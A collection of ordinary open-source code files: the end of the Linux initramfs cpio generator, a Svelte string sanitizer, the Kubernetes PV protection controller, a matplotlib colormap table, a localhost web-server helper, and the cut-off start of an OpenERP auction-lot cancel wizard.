unsigned int mode;
int uid;
int gid;
int rc = -1;
if (5 != sscanf(line, "%" str(PATH_MAX) "s %" str(PATH_MAX) "s %o %d %d", name, target, &mode, &uid, &gid)) {
fprintf(stderr, "Unrecognized dir format '%s'", line);
goto fail;
}
rc = cpio_mkslink(name, target, mode, uid, gid);
fail:
return rc;
}
static int cpio_mkgeneric(const char *name, unsigned int mode,
uid_t uid, gid_t gid)
{
int len;
unsigned int namesize;
if (name[0] == '/')
name++;
namesize = strlen(name) + 1;
len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
"%08X%08X%08X%08X%08X%08X%08X",
do_csum ? "070702" : "070701", /* magic */
ino++, /* ino */
mode, /* mode */
(long) uid, /* uid */
(long) gid, /* gid */
2, /* nlink */
(long) default_mtime, /* mtime */
0, /* filesize */
3, /* major */
1, /* minor */
0, /* rmajor */
0, /* rminor */
namesize, /* namesize */
0); /* chksum */
offset += len;
if (len != CPIO_HDR_LEN ||
push_rest(name, namesize) < 0)
return -1;
return 0;
}
enum generic_types {
GT_DIR,
GT_PIPE,
GT_SOCK
};
struct generic_type {
const char *type;
mode_t mode;
};
static const struct generic_type generic_type_table[] = {
[GT_DIR] = {
.type = "dir",
.mode = S_IFDIR
},
[GT_PIPE] = {
.type = "pipe",
.mode = S_IFIFO
},
[GT_SOCK] = {
.type = "sock",
.mode = S_IFSOCK
}
};
static int cpio_mkgeneric_line(const char *line, enum generic_types gt)
{
char name[PATH_MAX + 1];
unsigned int mode;
int uid;
int gid;
int rc = -1;
if (4 != sscanf(line, "%" str(PATH_MAX) "s %o %d %d", name, &mode, &uid, &gid)) {
fprintf(stderr, "Unrecognized %s format '%s'",
line, generic_type_table[gt].type);
goto fail;
}
mode |= generic_type_table[gt].mode;
rc = cpio_mkgeneric(name, mode, uid, gid);
fail:
return rc;
}
static int cpio_mkdir_line(const char *line)
{
return cpio_mkgeneric_line(line, GT_DIR);
}
static int cpio_mkpipe_line(const char *line)
{
return cpio_mkgeneric_line(line, GT_PIPE);
}
static int cpio_mksock_line(const char *line)
{
return cpio_mkgeneric_line(line, GT_SOCK);
}
static int cpio_mknod(const char *name, unsigned int mode,
uid_t uid, gid_t gid, char dev_type,
unsigned int maj, unsigned int min)
{
int len;
unsigned int namesize;
if (dev_type == 'b')
mode |= S_IFBLK;
else
mode |= S_IFCHR;
if (name[0] == '/')
name++;
namesize = strlen(name) + 1;
len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
"%08X%08X%08X%08X%08X%08X%08X",
do_csum ? "070702" : "070701", /* magic */
ino++, /* ino */
mode, /* mode */
(long) uid, /* uid */
(long) gid, /* gid */
1, /* nlink */
(long) default_mtime, /* mtime */
0, /* filesize */
3, /* major */
1, /* minor */
maj, /* rmajor */
min, /* rminor */
namesize, /* namesize */
0); /* chksum */
offset += len;
if (len != CPIO_HDR_LEN ||
push_rest(name, namesize) < 0)
return -1;
return 0;
}
static int cpio_mknod_line(const char *line)
{
char name[PATH_MAX + 1];
unsigned int mode;
int uid;
int gid;
char dev_type;
unsigned int maj;
unsigned int min;
int rc = -1;
if (7 != sscanf(line, "%" str(PATH_MAX) "s %o %d %d %c %u %u",
name, &mode, &uid, &gid, &dev_type, &maj, &min)) {
fprintf(stderr, "Unrecognized nod format '%s'", line);
goto fail;
}
rc = cpio_mknod(name, mode, uid, gid, dev_type, maj, min);
fail:
return rc;
}
static int cpio_mkfile_csum(int fd, unsigned long size, uint32_t *csum)
{
while (size) {
unsigned char filebuf[65536];
ssize_t this_read;
size_t i, this_size = MIN(size, sizeof(filebuf));
this_read = read(fd, filebuf, this_size);
if (this_read <= 0 || this_read > this_size)
return -1;
for (i = 0; i < this_read; i++)
*csum += filebuf[i];
size -= this_read;
}
/* seek back to the start for data segment I/O */
if (lseek(fd, 0, SEEK_SET) < 0)
return -1;
return 0;
}
static int cpio_mkfile(const char *name, const char *location,
unsigned int mode, uid_t uid, gid_t gid,
unsigned int nlinks)
{
struct stat buf;
unsigned long size;
int file, retval, len;
int rc = -1;
time_t mtime;
int namesize, namepadlen;
unsigned int i;
uint32_t csum = 0;
ssize_t this_read;
mode |= S_IFREG;
file = open (location, O_RDONLY);
if (file < 0) {
fprintf (stderr, "File %s could not be opened for reading\n", location);
goto error;
}
retval = fstat(file, &buf);
if (retval) {
fprintf(stderr, "File %s could not be stat()'ed\n", location);
goto error;
}
if (do_file_mtime) {
mtime = default_mtime;
} else {
mtime = buf.st_mtime;
if (mtime > 0xffffffff) {
fprintf(stderr, "%s: Timestamp exceeds maximum cpio timestamp, clipping.\n",
location);
mtime = 0xffffffff;
}
if (mtime < 0) {
fprintf(stderr, "%s: Timestamp negative, clipping.\n",
location);
mtime = 0;
}
}
if (buf.st_size > 0xffffffff) {
fprintf(stderr, "%s: Size exceeds maximum cpio file size\n",
location);
goto error;
}
if (do_csum && cpio_mkfile_csum(file, buf.st_size, &csum) < 0) {
fprintf(stderr, "Failed to checksum file %s\n", location);
goto error;
}
size = 0;
namepadlen = 0;
for (i = 1; i <= nlinks; i++) {
if (name[0] == '/')
name++;
namesize = strlen(name) + 1;
/* data goes on last link, after any alignment padding */
if (i == nlinks)
size = buf.st_size;
if (dalign && size > dalign) {
namepadlen = padlen(offset + CPIO_HDR_LEN + namesize,
dalign);
if (namesize + namepadlen > PATH_MAX) {
fprintf(stderr,
"%s: best-effort alignment %u missed\n",
name, dalign);
namepadlen = 0;
}
}
len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
"%08lX%08X%08X%08X%08X%08X%08X",
do_csum ? "070702" : "070701", /* magic */
ino, /* ino */
mode, /* mode */
(long) uid, /* uid */
(long) gid, /* gid */
nlinks, /* nlink */
(long) mtime, /* mtime */
size, /* filesize */
3, /* major */
1, /* minor */
0, /* rmajor */
0, /* rminor */
namesize + namepadlen, /* namesize */
size ? csum : 0); /* chksum */
offset += len;
if (len != CPIO_HDR_LEN ||
push_buf(name, namesize) < 0 ||
push_pad(namepadlen ? namepadlen : padlen(offset, 4)) < 0)
goto error;
if (size) {
this_read = copy_file_range(file, NULL, outfd, NULL, size, 0);
if (this_read > 0) {
if (this_read > size)
goto error;
offset += this_read;
size -= this_read;
}
/* short or failed copy falls back to read/write... */
}
while (size) {
unsigned char filebuf[65536];
size_t this_size = MIN(size, sizeof(filebuf));
this_read = read(file, filebuf, this_size);
if (this_read <= 0 || this_read > this_size) {
fprintf(stderr, "Can not read %s file\n", location);
goto error;
}
if (write(outfd, filebuf, this_read) != this_read) {
fprintf(stderr, "writing filebuf failed\n");
goto error;
}
offset += this_read;
size -= this_read;
}
if (push_pad(padlen(offset, 4)) < 0)
goto error;
name += namesize;
}
ino++;
rc = 0;
error:
if (file >= 0)
close(file);
return rc;
}
static char *cpio_replace_env(char *new_location)
{
char expanded[PATH_MAX + 1];
char *start, *end, *var;
while ((start = strstr(new_location, "${")) &&
(end = strchr(start + 2, '}'))) {
*start = *end = 0;
var = getenv(start + 2);
snprintf(expanded, sizeof expanded, "%s%s%s",
new_location, var ? var : "", end + 1);
strcpy(new_location, expanded);
}
return new_location;
}
static int cpio_mkfile_line(const char *line)
{
char name[PATH_MAX + 1];
char *dname = NULL; /* malloc'ed buffer for hard links */
char location[PATH_MAX + 1];
unsigned int mode;
int uid;
int gid;
int nlinks = 1;
int end = 0, dname_len = 0;
int rc = -1;
if (5 > sscanf(line, "%" str(PATH_MAX) "s %" str(PATH_MAX)
"s %o %d %d %n",
name, location, &mode, &uid, &gid, &end)) {
fprintf(stderr, "Unrecognized file format '%s'", line);
goto fail;
}
if (end && isgraph(line[end])) {
int len;
int nend;
dname = malloc(strlen(line));
if (!dname) {
fprintf (stderr, "out of memory (%d)\n", dname_len);
goto fail;
}
dname_len = strlen(name) + 1;
memcpy(dname, name, dname_len);
do {
nend = 0;
if (sscanf(line + end, "%" str(PATH_MAX) "s %n",
name, &nend) < 1)
break;
len = strlen(name) + 1;
memcpy(dname + dname_len, name, len);
dname_len += len;
nlinks++;
end += nend;
} while (isgraph(line[end]));
} else {
dname = name;
}
rc = cpio_mkfile(dname, cpio_replace_env(location),
mode, uid, gid, nlinks);
fail:
if (dname_len) free(dname);
return rc;
}
static void usage(const char *prog)
{
fprintf(stderr, "Usage:\n"
"\t%s [-t <timestamp>] [-c] [-o <output_file>] [-a <data_align>] <cpio_list>\n"
"\n"
"<cpio_list> is a file containing newline separated entries that\n"
"describe the files to be included in the initramfs archive:\n"
"\n"
"# a comment\n"
"file <name> <location> <mode> <uid> <gid> [<hard links>]\n"
"dir <name> <mode> <uid> <gid>\n"
"nod <name> <mode> <uid> <gid> <dev_type> <maj> <min>\n"
"slink <name> <target> <mode> <uid> <gid>\n"
"pipe <name> <mode> <uid> <gid>\n"
"sock <name> <mode> <uid> <gid>\n"
"\n"
"<name> name of the file/dir/nod/etc in the archive\n"
"<location> location of the file in the current filesystem\n"
" expands shell variables quoted with ${}\n"
"<target> link target\n"
"<mode> mode/permissions of the file\n"
"<uid> user id (0=root)\n"
"<gid> group id (0=root)\n"
"<dev_type> device type (b=block, c=character)\n"
"<maj> major number of nod\n"
"<min> minor number of nod\n"
"<hard links> space separated list of other links to file\n"
"\n"
"example:\n"
"# A simple initramfs\n"
"dir /dev 0755 0 0\n"
"nod /dev/console 0600 0 0 c 5 1\n"
"dir /root 0700 0 0\n"
"dir /sbin 0755 0 0\n"
"file /sbin/kinit /usr/src/klibc/kinit/kinit 0755 0 0\n"
"\n"
"<timestamp> is time in seconds since Epoch that will be used\n"
"as mtime for symlinks, directories, regular and special files.\n"
"The default is to use the current time for all files, but\n"
"preserve modification time for regular files.\n"
"-c: calculate and store 32-bit checksums for file data.\n"
"<output_file>: write cpio to this file instead of stdout\n"
"<data_align>: attempt to align file data by zero-padding the\n"
"filename field up to data_align. Must be a multiple of 4.\n"
"Alignment is best-effort; PATH_MAX limits filename padding.\n",
prog);
}
static const struct file_handler file_handler_table[] = {
{
.type = "file",
.handler = cpio_mkfile_line,
}, {
.type = "nod",
.handler = cpio_mknod_line,
}, {
.type = "dir",
.handler = cpio_mkdir_line,
}, {
.type = "slink",
.handler = cpio_mkslink_line,
}, {
.type = "pipe",
.handler = cpio_mkpipe_line,
}, {
.type = "sock",
.handler = cpio_mksock_line,
}, {
.type = NULL,
.handler = NULL,
}
};
#define LINE_SIZE (2 * PATH_MAX + 50)
int main (int argc, char *argv[])
{
FILE *cpio_list;
char line[LINE_SIZE];
char *args, *type;
int ec = 0;
int line_nr = 0;
const char *filename;
default_mtime = time(NULL);
while (1) {
int opt = getopt(argc, argv, "t:cho:a:");
char *invalid;
if (opt == -1)
break;
switch (opt) {
case 't':
default_mtime = strtol(optarg, &invalid, 10);
if (!*optarg || *invalid) {
fprintf(stderr, "Invalid timestamp: %s\n",
optarg);
usage(argv[0]);
exit(1);
}
do_file_mtime = true;
break;
case 'c':
do_csum = true;
break;
case 'o':
outfd = open(optarg,
O_WRONLY | O_CREAT | O_LARGEFILE | O_TRUNC,
0600);
if (outfd < 0) {
fprintf(stderr, "failed to open %s\n", optarg);
usage(argv[0]);
exit(1);
}
break;
case 'a':
dalign = strtoul(optarg, &invalid, 10);
if (!*optarg || *invalid || (dalign & 3)) {
fprintf(stderr, "Invalid data_align: %s\n",
optarg);
usage(argv[0]);
exit(1);
}
break;
case 'h':
case '?':
usage(argv[0]);
exit(opt == 'h' ? 0 : 1);
}
}
/*
* Timestamps after 2106-02-07 06:28:15 UTC have an ascii hex time_t
* representation that exceeds 8 chars and breaks the cpio header
* specification. Negative timestamps similarly exceed 8 chars.
*/
if (default_mtime > 0xffffffff || default_mtime < 0) {
fprintf(stderr, "ERROR: Timestamp out of range for cpio format\n");
exit(1);
}
if (argc - optind != 1) {
usage(argv[0]);
exit(1);
}
filename = argv[optind];
if (!strcmp(filename, "-"))
cpio_list = stdin;
else if (!(cpio_list = fopen(filename, "r"))) {
fprintf(stderr, "ERROR: unable to open '%s': %s\n\n",
filename, strerror(errno));
usage(argv[0]);
exit(1);
}
while (fgets(line, LINE_SIZE, cpio_list)) {
int type_idx;
size_t slen = strlen(line);
line_nr++;
if ('#' == *line) {
/* comment - skip to next line */
continue;
}
if (! (type = strtok(line, " \t"))) {
fprintf(stderr,
"ERROR: incorrect format, could not locate file type line %d: '%s'\n",
line_nr, line);
ec = -1;
break;
}
if ('\n' == *type) {
/* a blank line */
continue;
}
if (slen == strlen(type)) {
/* must be an empty line */
continue;
}
if (! (args = strtok(NULL, "\n"))) {
fprintf(stderr,
"ERROR: incorrect format, newline required line %d: '%s'\n",
line_nr, line);
ec = -1;
}
for (type_idx = 0; file_handler_table[type_idx].type; type_idx++) {
int rc;
if (! strcmp(line, file_handler_table[type_idx].type)) {
if ((rc = file_handler_table[type_idx].handler(args))) {
ec = rc;
fprintf(stderr, " line %d\n", line_nr);
}
break;
}
}
if (NULL == file_handler_table[type_idx].type) {
fprintf(stderr, "unknown file type line %d: '%s'\n",
line_nr, line);
}
}
if (ec == 0)
ec = cpio_trailer();
exit(ec);
} | c | github | https://github.com/torvalds/linux | usr/gen_init_cpio.c |
/**
* @param {string} str
* @returns {string}
*/
export function sanitize_template_string(str) {
return str.replace(/(`|\${|\\)/g, '\\$1');
} | javascript | github | https://github.com/sveltejs/svelte | packages/svelte/src/compiler/utils/sanitize_template_string.js |
/*
Copyright 2018 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package pvprotection
import (
"context"
"fmt"
"sync"
"time"
v1 "k8s.io/api/core/v1"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
utilruntime "k8s.io/apimachinery/pkg/util/runtime"
"k8s.io/apimachinery/pkg/util/wait"
coreinformers "k8s.io/client-go/informers/core/v1"
clientset "k8s.io/client-go/kubernetes"
corelisters "k8s.io/client-go/listers/core/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/util/workqueue"
"k8s.io/klog/v2"
"k8s.io/kubernetes/pkg/controller/volume/protectionutil"
"k8s.io/kubernetes/pkg/util/slice"
volumeutil "k8s.io/kubernetes/pkg/volume/util"
)
// Controller is controller that removes PVProtectionFinalizer
// from PVs that are not bound to PVCs.
type Controller struct {
client clientset.Interface
pvLister corelisters.PersistentVolumeLister
pvListerSynced cache.InformerSynced
queue workqueue.TypedRateLimitingInterface[string]
}
// NewPVProtectionController returns a new *Controller.
func NewPVProtectionController(logger klog.Logger, pvInformer coreinformers.PersistentVolumeInformer, cl clientset.Interface) *Controller {
e := &Controller{
client: cl,
queue: workqueue.NewTypedRateLimitingQueueWithConfig(
workqueue.DefaultTypedControllerRateLimiter[string](),
workqueue.TypedRateLimitingQueueConfig[string]{Name: "pvprotection"},
),
}
e.pvLister = pvInformer.Lister()
e.pvListerSynced = pvInformer.Informer().HasSynced
pvInformer.Informer().AddEventHandler(cache.ResourceEventHandlerFuncs{
AddFunc: func(obj interface{}) {
e.pvAddedUpdated(logger, obj)
},
UpdateFunc: func(old, new interface{}) {
e.pvAddedUpdated(logger, new)
},
})
return e
}
// Run runs the controller goroutines.
func (c *Controller) Run(ctx context.Context, workers int) {
defer utilruntime.HandleCrash()
logger := klog.FromContext(ctx)
logger.Info("Starting PV protection controller")
var wg sync.WaitGroup
defer func() {
logger.Info("Shutting down PV protection controller")
c.queue.ShutDown()
wg.Wait()
}()
if !cache.WaitForNamedCacheSyncWithContext(ctx, c.pvListerSynced) {
return
}
for i := 0; i < workers; i++ {
wg.Go(func() {
wait.UntilWithContext(ctx, c.runWorker, time.Second)
})
}
<-ctx.Done()
}
func (c *Controller) runWorker(ctx context.Context) {
for c.processNextWorkItem(ctx) {
}
}
// processNextWorkItem deals with one pvcKey off the queue. It returns false when it's time to quit.
func (c *Controller) processNextWorkItem(ctx context.Context) bool {
pvKey, quit := c.queue.Get()
if quit {
return false
}
defer c.queue.Done(pvKey)
pvName := pvKey
err := c.processPV(ctx, pvName)
if err == nil {
c.queue.Forget(pvKey)
return true
}
utilruntime.HandleError(fmt.Errorf("PV %v failed with : %v", pvKey, err))
c.queue.AddRateLimited(pvKey)
return true
}
func (c *Controller) processPV(ctx context.Context, pvName string) error {
logger := klog.FromContext(ctx)
logger.V(4).Info("Processing PV", "PV", klog.KRef("", pvName))
startTime := time.Now()
defer func() {
logger.V(4).Info("Finished processing PV", "PV", klog.KRef("", pvName), "cost", time.Since(startTime))
}()
pv, err := c.pvLister.Get(pvName)
if apierrors.IsNotFound(err) {
logger.V(4).Info("PV not found, ignoring", "PV", klog.KRef("", pvName))
return nil
}
if err != nil {
return err
}
if protectionutil.IsDeletionCandidate(pv, volumeutil.PVProtectionFinalizer) {
// PV should be deleted. Check if it's used and remove finalizer if
// it's not.
isUsed := c.isBeingUsed(pv)
if !isUsed {
return c.removeFinalizer(ctx, pv)
}
logger.V(4).Info("Keeping PV because it is being used", "PV", klog.KRef("", pvName))
}
if protectionutil.NeedToAddFinalizer(pv, volumeutil.PVProtectionFinalizer) {
// PV is not being deleted -> it should have the finalizer. The
// finalizer should be added by admission plugin, this is just to add
// the finalizer to old PVs that were created before the admission
// plugin was enabled.
return c.addFinalizer(ctx, pv)
}
return nil
}
func (c *Controller) addFinalizer(ctx context.Context, pv *v1.PersistentVolume) error {
pvClone := pv.DeepCopy()
pvClone.ObjectMeta.Finalizers = append(pvClone.ObjectMeta.Finalizers, volumeutil.PVProtectionFinalizer)
_, err := c.client.CoreV1().PersistentVolumes().Update(ctx, pvClone, metav1.UpdateOptions{})
logger := klog.FromContext(ctx)
if err != nil {
logger.V(3).Info("Error adding protection finalizer to PV", "PV", klog.KObj(pv), "err", err)
return err
}
logger.V(3).Info("Added protection finalizer to PV", "PV", klog.KObj(pv))
return nil
}
func (c *Controller) removeFinalizer(ctx context.Context, pv *v1.PersistentVolume) error {
pvClone := pv.DeepCopy()
pvClone.ObjectMeta.Finalizers = slice.RemoveString(pvClone.ObjectMeta.Finalizers, volumeutil.PVProtectionFinalizer, nil)
_, err := c.client.CoreV1().PersistentVolumes().Update(ctx, pvClone, metav1.UpdateOptions{})
logger := klog.FromContext(ctx)
if err != nil {
logger.V(3).Info("Error removing protection finalizer from PV", "PV", klog.KObj(pv), "err", err)
return err
}
logger.V(3).Info("Removed protection finalizer from PV", "PV", klog.KObj(pv))
return nil
}
func (c *Controller) isBeingUsed(pv *v1.PersistentVolume) bool {
// check if PV is being bound to a PVC by its status
// the status will be updated by PV controller
if pv.Status.Phase == v1.VolumeBound {
// the PV is being used now
return true
}
return false
}
// pvAddedUpdated reacts to pv added/updated events
func (c *Controller) pvAddedUpdated(logger klog.Logger, obj interface{}) {
pv, ok := obj.(*v1.PersistentVolume)
if !ok {
utilruntime.HandleError(fmt.Errorf("PV informer returned non-PV object: %#v", obj))
return
}
logger.V(4).Info("Got event on PV", "PV", klog.KObj(pv))
if protectionutil.NeedToAddFinalizer(pv, volumeutil.PVProtectionFinalizer) || protectionutil.IsDeletionCandidate(pv, volumeutil.PVProtectionFinalizer) {
c.queue.Add(pv.Name)
}
} | go | github | https://github.com/kubernetes/kubernetes | pkg/controller/volume/pvprotection/pv_protection_controller.go |
from matplotlib.colors import LinearSegmentedColormap
from numpy import nan, inf
cm_data = [[0., 0., 0.],
[0.0156863, 0., 0.0117647],
[0.0352941, 0., 0.027451],
[0.0509804, 0., 0.0392157],
[0.0705882, 0., 0.054902],
[0.0862745, 0., 0.0745098],
[0.105882, 0., 0.0901961],
[0.121569, 0., 0.109804],
[0.141176, 0., 0.12549],
[0.156863, 0., 0.14902],
[0.176471, 0., 0.168627],
[0.196078, 0., 0.188235],
[0.227451, 0., 0.231373],
[0.239216, 0., 0.247059],
[0.25098, 0., 0.266667],
[0.266667, 0., 0.282353],
[0.270588, 0., 0.301961],
[0.282353, 0., 0.317647],
[0.290196, 0., 0.337255],
[0.301961, 0., 0.356863],
[0.309804, 0., 0.372549],
[0.313725, 0., 0.392157],
[0.321569, 0., 0.407843],
[0.32549, 0., 0.427451],
[0.329412, 0., 0.462745],
[0.337255, 0., 0.478431],
[0.341176, 0., 0.498039],
[0.345098, 0., 0.517647],
[0.337255, 0., 0.533333],
[0.341176, 0., 0.552941],
[0.341176, 0., 0.568627],
[0.341176, 0., 0.588235],
[0.333333, 0., 0.603922],
[0.329412, 0., 0.623529],
[0.329412, 0., 0.639216],
[0.329412, 0., 0.658824],
[0.309804, 0., 0.694118],
[0.305882, 0., 0.713725],
[0.301961, 0., 0.729412],
[0.298039, 0., 0.74902],
[0.278431, 0., 0.764706],
[0.27451, 0., 0.784314],
[0.266667, 0., 0.8],
[0.258824, 0., 0.819608],
[0.235294, 0., 0.839216],
[0.227451, 0., 0.854902],
[0.215686, 0., 0.87451],
[0.180392, 0., 0.909804],
[0.168627, 0., 0.92549],
[0.156863, 0., 0.945098],
[0.141176, 0., 0.960784],
[0.129412, 0., 0.980392],
[0.0980392, 0., 1.],
[0.0823529, 0., 1.],
[0.0627451, 0., 1.],
[0.0470588, 0., 1.],
[0.0156863, 0., 1.],
[0., 0., 1.],
[0., 0.0156863, 1.],
[0., 0.0627451, 1.],
[0., 0.0823529, 1.],
[0., 0.0980392, 1.],
[0., 0.113725, 1.],
[0., 0.14902, 1.],
[0., 0.164706, 1.],
[0., 0.180392, 1.],
[0., 0.2, 1.],
[0., 0.215686, 1.],
[0., 0.247059, 1.],
[0., 0.262745, 1.],
[0., 0.282353, 1.],
[0., 0.329412, 1.],
[0., 0.34902, 1.],
[0., 0.364706, 1.],
[0., 0.380392, 1.],
[0., 0.415686, 1.],
[0., 0.431373, 1.],
[0., 0.447059, 1.],
[0., 0.466667, 1.],
[0., 0.498039, 1.],
[0., 0.513725, 1.],
[0., 0.529412, 1.],
[0., 0.54902, 1.],
[0., 0.596078, 1.],
[0., 0.615686, 1.],
[0., 0.631373, 1.],
[0., 0.647059, 1.],
[0., 0.682353, 1.],
[0., 0.698039, 1.],
[0., 0.713725, 1.],
[0., 0.733333, 1.],
[0., 0.764706, 1.],
[0., 0.780392, 1.],
[0., 0.796078, 1.],
[0., 0.847059, 1.],
[0., 0.862745, 1.],
[0., 0.882353, 1.],
[0., 0.898039, 1.],
[0., 0.913725, 1.],
[0., 0.94902, 1.],
[0., 0.964706, 1.],
[0., 0.980392, 1.],
[0., 1., 1.],
[0., 1., 0.964706],
[0., 1., 0.94902],
[0., 1., 0.933333],
[0., 1., 0.882353],
[0., 1., 0.862745],
[0., 1., 0.847059],
[0., 1., 0.831373],
[0., 1., 0.796078],
[0., 1., 0.780392],
[0., 1., 0.764706],
[0., 1., 0.74902],
[0., 1., 0.733333],
[0., 1., 0.698039],
[0., 1., 0.682353],
[0., 1., 0.666667],
[0., 1., 0.615686],
[0., 1., 0.596078],
[0., 1., 0.580392],
[0., 1., 0.564706],
[0., 1., 0.529412],
[0., 1., 0.513725],
[0., 1., 0.498039],
[0., 1., 0.482353],
[0., 1., 0.447059],
[0., 1., 0.431373],
[0., 1., 0.415686],
[0., 1., 0.4],
[0., 1., 0.34902],
[0., 1., 0.329412],
[0., 1., 0.313725],
[0., 1., 0.298039],
[0., 1., 0.262745],
[0., 1., 0.247059],
[0., 1., 0.231373],
[0., 1., 0.215686],
[0., 1., 0.180392],
[0., 1., 0.164706],
[0., 1., 0.14902],
[0., 1., 0.0980392],
[0., 1., 0.0823529],
[0., 1., 0.0627451],
[0., 1., 0.0470588],
[0., 1., 0.0313725],
[0., 1., 0.],
[0.0156863, 1., 0.],
[0.0313725, 1., 0.],
[0.0470588, 1., 0.],
[0.0823529, 1., 0.],
[0.0980392, 1., 0.],
[0.113725, 1., 0.],
[0.164706, 1., 0.],
[0.180392, 1., 0.],
[0.2, 1., 0.],
[0.215686, 1., 0.],
[0.247059, 1., 0.],
[0.262745, 1., 0.],
[0.282353, 1., 0.],
[0.298039, 1., 0.],
[0.313725, 1., 0.],
[0.34902, 1., 0.],
[0.364706, 1., 0.],
[0.380392, 1., 0.],
[0.431373, 1., 0.],
[0.447059, 1., 0.],
[0.466667, 1., 0.],
[0.482353, 1., 0.],
[0.513725, 1., 0.],
[0.529412, 1., 0.],
[0.54902, 1., 0.],
[0.564706, 1., 0.],
[0.6, 1., 0.],
[0.615686, 1., 0.],
[0.631373, 1., 0.],
[0.647059, 1., 0.],
[0.698039, 1., 0.],
[0.713725, 1., 0.],
[0.733333, 1., 0.],
[0.74902, 1., 0.],
[0.780392, 1., 0.],
[0.796078, 1., 0.],
[0.815686, 1., 0.],
[0.831373, 1., 0.],
[0.866667, 1., 0.],
[0.882353, 1., 0.],
[0.898039, 1., 0.],
[0.94902, 1., 0.],
[0.964706, 1., 0.],
[0.980392, 1., 0.],
[1., 1., 0.],
[1., 0.980392, 0.],
[1., 0.94902, 0.],
[1., 0.933333, 0.],
[1., 0.913725, 0.],
[1., 0.898039, 0.],
[1., 0.866667, 0.],
[1., 0.847059, 0.],
[1., 0.831373, 0.],
[1., 0.780392, 0.],
[1., 0.764706, 0.],
[1., 0.74902, 0.],
[1., 0.733333, 0.],
[1., 0.698039, 0.],
[1., 0.682353, 0.],
[1., 0.666667, 0.],
[1., 0.647059, 0.],
[1., 0.631373, 0.],
[1., 0.6, 0.],
[1., 0.580392, 0.],
[1., 0.564706, 0.],
[1., 0.513725, 0.],
[1., 0.498039, 0.],
[1., 0.482353, 0.],
[1., 0.466667, 0.],
[1., 0.431373, 0.],
[1., 0.415686, 0.],
[1., 0.4, 0.],
[1., 0.380392, 0.],
[1., 0.34902, 0.],
[1., 0.333333, 0.],
[1., 0.313725, 0.],
[1., 0.298039, 0.],
[1., 0.247059, 0.],
[1., 0.231373, 0.],
[1., 0.215686, 0.],
[1., 0.2, 0.],
[1., 0.164706, 0.],
[1., 0.14902, 0.],
[1., 0.133333, 0.],
[1., 0.113725, 0.],
[1., 0.0823529, 0.],
[1., 0.0666667, 0.],
[1., 0.0470588, 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 1., 1.]]
test_cm = LinearSegmentedColormap.from_list(__file__, cm_data)
if __name__ == "__main__":
import matplotlib.pyplot as plt
import numpy as np
try:
from pycam02ucs.cm.viscm import viscm
viscm(test_cm)
except ImportError:
print("pycam02ucs not found, falling back on simple display")
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto',
cmap=test_cm)
plt.show() | unknown | codeparrot/codeparrot-clean | ||
# helper to load url
# runs webserver and loads url with webbrowswer module
import sys
def load_url(path):
PORT = 8000
httpd = StoppableHTTPServer(("127.0.0.1",PORT), handler)
thread.start_new_thread(httpd.serve, ())
webbrowser.open_new('http://localhost:%s/%s'%(PORT,path))
input("Press <RETURN> to stop server\n")
httpd.stop()
print("To restart server run: \n%s"%server)
if sys.version_info[0] == 2:
import SimpleHTTPServer, BaseHTTPServer
import socket
import thread
import webbrowser
handler = SimpleHTTPServer.SimpleHTTPRequestHandler
input = raw_input
server = "python -m SimpleHTTPServer 8000"
class StoppableHTTPServer(BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
self.socket.settimeout(1)
self.run = True
def get_request(self):
while self.run:
try:
sock, addr = self.socket.accept()
sock.settimeout(None)
return (sock, addr)
except socket.timeout:
pass
def stop(self):
self.run = False
def serve(self):
while self.run:
self.handle_request()
else:
import http.server, http.server
import socket
import _thread as thread
import webbrowser
handler = http.server.SimpleHTTPRequestHandler
server = "python -m http.server 8000"
class StoppableHTTPServer(http.server.HTTPServer):
def server_bind(self):
http.server.HTTPServer.server_bind(self)
self.socket.settimeout(1)
self.run = True
def get_request(self):
while self.run:
try:
sock, addr = self.socket.accept()
sock.settimeout(None)
return (sock, addr)
except socket.timeout:
pass
def stop(self):
self.run = False
def serve(self):
while self.run:
self.handle_request() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import osv
from osv import fields
class auction_lots_cancel(osv.osv):
'''
OpenERP Model
'''
_name = 'auction.lots.cancel'
_description = 'To cancel auction lots.'
def cancel(self, cr, uid, ids, context=None):
"""
To cancel the auction lot
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return:
"""
if context is None:
context={}
lots_obj = self.pool.get('auction.lots')
invoice_obj = self.pool.get('account.invoice')
lot = lots_obj.browse(cr, uid, context.get('active_id', False), context=context)
if lot.ach_inv_id:
